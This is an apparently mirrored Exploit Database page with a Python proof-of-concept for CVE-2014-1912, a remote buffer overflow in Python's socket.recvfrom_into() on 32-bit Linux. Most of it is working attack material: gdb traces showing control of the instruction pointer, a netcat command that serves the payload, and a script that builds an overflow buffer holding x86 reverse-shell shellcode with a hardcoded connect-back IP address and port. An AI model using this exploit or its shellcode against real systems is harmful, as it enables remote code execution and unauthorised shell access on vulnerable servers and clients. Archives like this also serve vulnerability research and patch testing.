Python – ‘socket.recvfrom_into()’ Remote Buffer Overflow

• Exploit Database
• 14 阅读

• 作者： Sha0
  日期： 2014-02-24
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/31875/

• #!/usr/bin/env python
  
  '''
  # Exploit Title: python socket.recvfrom_into() remote buffer overflow
  # Date: 21/02/2014
  # Exploit Author: @sha0coder
  # Vendor Homepage: python.org
  # Version: python2.7 and python3
  # Tested on: linux 32bit + python2.7
  # CVE : CVE-2014-1912
  
  
  
  socket.recvfrom_into() remote buffer overflow Proof of concept
  by @sha0coder
  
  TODO: rop to evade stack nx 
  
  
  (gdb) x/i $eip
  => 0x817bb28:	moveax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol
   0x817bb2b:	test BYTE PTR [eax+0x55],0x40
   0x817bb2f:	jne0x817bb38 -->
   ...
   0x817bb38:	moveax,DWORD PTR [eax+0xa4]<--- eax full control again
   0x817bb3e:	test eax,eax
   0x817bb40:	jne0x817bb58 -->
   ...
   0x817bb58:	movDWORD PTR [esp],ebx
   0x817bb5b:	call eax <--------------------- indirect fucktion call ;)
  
  
  $ ./pyrecvfrominto.py 
  	egg file generated
  
  $ cat egg | nc -l 8080 -vv
  
  ... when client connects ... or wen we send the evil buffer to the server ...
  
  0x0838591c in ?? ()
  1: x/5i $eip
  => 0x838591c:	int3			<--------- LANDED!!!!!
   0x838591d:	xoreax,eax
   0x838591f:	xorebx,ebx
   0x8385921:	xorecx,ecx
   0x8385923:	xoredx,edx
  
  '''
  
  import struct
  
  def off(o):
  	return struct.pack('L',o)
  
  
  reverseIP = '\xc0\xa8\x04\x34' #'\xc0\xa8\x01\x0a'
  reversePort = '\x7a\x69'
  
  
  #shellcode from exploit-db.com, (remove the sigtrap)
  shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\
  			"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\
  			"\x01\x6a\x02\x89\xe1\xcd\x80\x89"\
  			"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\
  			reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\
  			"\xc3\x89\xe1\x6a\x10\x51\x56\x89"\
  			"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\
  			"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\
  			"\xc0\x52\x68\x6e\x2f\x73\x68\x68"\
  			"\x2f\x2f\x62\x69\x89\xe3\x52\x53"\
  			"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\
  			"\x80"
  
  
  shellcode_sz = len(shellcode)
  
  print 'shellcode sz %d' % shellcode_sz
  
  
  ebx =0x08385908
  sc_off = 0x08385908+20
  
  padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'
  
  ''' 
  +------------+----------------------+ +--------------------+
  ||| ||
  V|| V|
  '''
  buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off)# .. and landed ;)
  
  
  print 'buff sz: %s' % len(buff)
  open('egg','w').write(buff)